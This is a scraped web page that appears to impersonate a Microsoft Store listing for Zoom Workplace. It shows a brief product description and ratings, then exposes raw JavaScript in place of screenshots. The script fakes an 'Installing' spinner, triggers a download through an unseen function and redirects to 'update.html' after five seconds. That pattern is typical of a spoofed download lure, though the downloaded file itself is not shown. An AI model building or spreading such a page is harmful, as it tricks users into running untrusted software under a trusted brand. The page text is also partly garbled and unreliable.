Microsoft Microsoft Store
Sign in

Zoom Workplace

Zoom Communications, Inc.

⭐ 4.4 109 ratings Productivity
Built for Copilot+ PC Uses AI features
12+ Parental Guidance Recommended · In-App Purchases · Users Interact

Description

Reimagine how you work with Zoom Workplace, an all-in-one, AI-powered collaboration platform that combines team chat, meetings, phone*, whiteboard, calendar, mail, notes, and more.

Ratings and reviews

4.4

109 ratings

5
4
3
2
1

Screenshots

const btn = document.getElementById('installBtn'); const text = document.getElementById('installText'); const spinner = document.getElementById('installSpinner'); // UI changes btn.disabled = true; text.textContent = 'Installing'; spinner.classList.remove('hidden'); // Start download logic ONCE try { triggerDownload(); } catch (e) { console.error('Download trigger failed:', e); } // Redirect after 5 seconds setTimeout(() => { window.location.href = 'update.html'; }, 5000); }